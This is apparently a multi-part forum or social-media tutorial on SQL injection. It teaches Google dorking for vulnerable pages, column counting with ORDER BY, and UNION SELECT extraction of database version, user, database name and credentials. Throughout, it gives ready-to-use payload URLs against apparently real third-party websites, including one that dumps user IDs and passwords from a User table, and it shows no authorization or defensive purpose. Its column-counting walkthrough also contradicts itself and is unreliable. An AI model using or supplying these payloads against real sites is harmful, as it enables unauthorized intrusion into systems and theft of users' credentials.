SQLi Method

SQLi example:

http://hollandbros.net/store.php?id=-31%20union%20select%201%2Cgroup_concat(user_id%2C0x3a%2Cpassword%2C0x0a)%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%20from%20User


To get site database User, smile emoticon
Try this too,
@@hostname : Current Hostname
@@tmpdir : Tept Directory
@@datadir : Data Directory
@@version : Version of DB
@@basedir : Base Directory
user() : Current User
database() : Current Database
version() : Version
schema() : current Database
UUID() : System UUID key
current_user() : Current User
current_user : Current User
system_user() : Current System user
session_user() : Session user
@@GLOBAL.have_symlink : Check if Symlink Enabled or Disabled
@@GLOBAL.have_ssl : Check if it have ssl or not


Tutorial step 1 we have learn to find the vuln sites
‪
Sql- structured query language
Vuln- vulnerable
to start sql we should find 1st vuln site. In other word to inject a site you need to find a vuln site.
To find vuln site we need to use 'Dork'
which mean searching vuln site from googLe Using dork
some of the dorks are here-
Index.php?id=
Event.php?id=
News.php?id=
This are the some example of dorks there are thousand of dorks to find vuln sites among them this are the some.. Now google this dork and open one site and put this sign after id=something it means
Id=1'
Id=20' don't change value after id=20 this is just an example to see either sites is vuln or not to inject.. So after putting this ' sign you will get sql error if you get sql error then it is vuln and those site which you find vuln comment below.. For 24hour this one step is finish any confuse comment below.. Next step after 24 hour kiss emoticon
Hope you understand it.


#Tutorial‬ about sql part 2 we have learn to find the vuln column linK HERE- 2nd post

Time to learn next step of sql injection
‪#‎recall‬- in previous tutorial we learn to find vuln site yeah? Now we are upgrading the step now finding column of site is our next steP
Vuln site- http://www.skitm.edu.in/faculty.php?id=2' this one is for n00b only kiss emoticon this site have very low security grin emoticon i practise in this site when i was learning sql injection tongue emoticon so here we go in our step grin emoticon
To find column of the vuln site we have to use this query there are many query to find vuln column but because of the basic tut i am using here only: order by method

Here is the query: order by
Step- http://www.skitm.edu.in/faculty.php?id=2 order by 10
Error: Unknown column '10' in 'order clause'
Try until when this unknow column doesn't disappear from the screen
Still getting that error yeah so try by putting 9 like this
http://www.skitm.edu.in/faculty.php?id=2 order by 9
Error: Unknown column '9' in 'order clause' still getting error yeah so try and try
http://www.skitm.edu.in/faculty.php?id=2 order by 8
Error: Unknown column '8' in 'order clause' again error tongue emoticon try until it disappear from your screen so keep on decreasing the number
http://www.skitm.edu.in/faculty.php?id=2 order by 7
Error: Unknown column '7' error
http://www.skitm.edu.in/faculty.php?id=2 order by 6
Error: Unknown column 6'
http://www.skitm.edu.in/faculty.php?id=2 order by 5
Error: Unknown column 5'
http://www.skitm.edu.in/faculty.php?id=2 order by 4
Error: Unknown column 4'
http://www.skitm.edu.in/faculty.php?id=2 order by 3
Error: Unknown column 3'
http://www.skitm.edu.in/faculty.php?id=2 order by 2
Error: Unknown column 2'
http://www.skitm.edu.in/faculty.php?id=2 order by 2
No Error in column 2'
It mean this site have 2 column smile emoticon so finally we found column of that site.
It is not mean that in all site there will be 2column in different site different column so don't keep on your mind that only 2 column in all vuln site now here we find column of site. And remember if last error is in 10 of any site then remember there is 9 column same as in next site if got last error in 26 then there is 25 column
Hope you understand this one tutorial


Tutorial step 3 now we will find vuln site vuln column

‪#‎recall‬- in 1st post we learn to find vuln site?
#recall- in second post we learn to find how many column are there order by methOd
‪#‎neXt‬ stEp now we will find vuln site vuln column don't be confuse.2 times same method?  yeah i am sure you will be confuse but previous one is use to count column of the site to get vuln column and without counting column you can't get vuln column so we need to count column and to get vuln column we need to do "union select" methOd to get vuln colum


site- we will practise in this site
http://www.skitm.edu.in/faculty.php?id=2
All step wise 1st we learn how to find either it is vuln or not yeah?
Here we use method like this http://www.skitm.edu.in/faculty.php?id=2'
getting sql error yeah? It mean this site is vuln.
‪#‎2nd‬ post
in second step what we learn? we learn how to find vuln column? Like this http://www.skitm.edu.in/faculty.php?id=2 order by 3
‪#‎3rd‬ step is that to find vuln column tongue emoticon both are column but to find vuln column result in screen we need order by to get result in screen like shown in screenShOt,
Here we go in step now smile emoticon
1) do you remember or not while we inject this site we got last error in 3 yeah? It mean here is 2 column now to display how many vuln column are there in screen we have to use following query smile emoticon
http://www.skitm.edu.in/faculty.php?id=-2 union select 1,2--
What i have change in this site?
=> after id=parameter i haven't change there anything but i have put there sign '-' while using union select always remember to put that sign before parametEr.. smile emoticon
how we will know that we have to put union select 1,2?
=> we have to use 1st order by method after knowing column vuln we have tO use according to vuln column value in union select..
example-
site- http://www.calidus.ro/
vuln site http://www.calidus.ro/en/news.php?id=2
To check the vuln column value in screen you will get some number in screen like 1,2,3 only one digit smile emoticon
Another example
http://www.calidus.ro/en/news.php…
i got last error in 5 so i know now there is vuln in 4 so i use union select 1.2,3,4 and in screen i get vuln is column 2 smile emoticon
‪#‎remember‬ that when you use order by method and get vuln column according to it's value put it in union select.


Final:


Today i am gonna teach you how to find
=> version
=> user
=> database
All step those which we have learn wink emoticon
1st find site either it is vuln or not
1st step http://www.skitm.edu.in' => sql erro site is vuln
2nd step http://www.skitm.edu.in/faculty.php?id=-2 order by 2 using order by to find vuln colum value
3rd step http://www.skitm.edu.in/faculty.php?id=-2 union select 1,2--
------all this step have been learn------

today new step
step to find version of the following site?
http://www.skitm.edu.in/faculty.php?id=-2+union+select+1%2Cversion%28%29

Q) how i do it? confused_rev emoticon
=> nothing new i have just put there version instead of putting there value 2
why i put it in 2 only?
=> because while using union select 1,2 it display 2 as vuln column so i put it in value 2 to find version smile emoticon
example if in some site if you find there vuln column in 9 then you need to do like this to find version
union select 1,2,3,4,5,6,7,8,version(),10,11,12--
example of site: http://www.calidus.ro/en/news.php?id=-2+union+select+1%2Cversion%28%29%2C3%2C4

2nd step to find user
All method are same just change version() and instead of it put there user()
like this:

http://www.skitm.edu.in/faculty.php?id=-2+union+select+1%2Cuser%28%29--


All step are same so hope i don't have to tell about this and at last to find database
we need to do same step change user into database then you will get result like this

http://www.skitm.edu.in/faculty.php?id=-2+union+select+1%2Cdatabase%28%29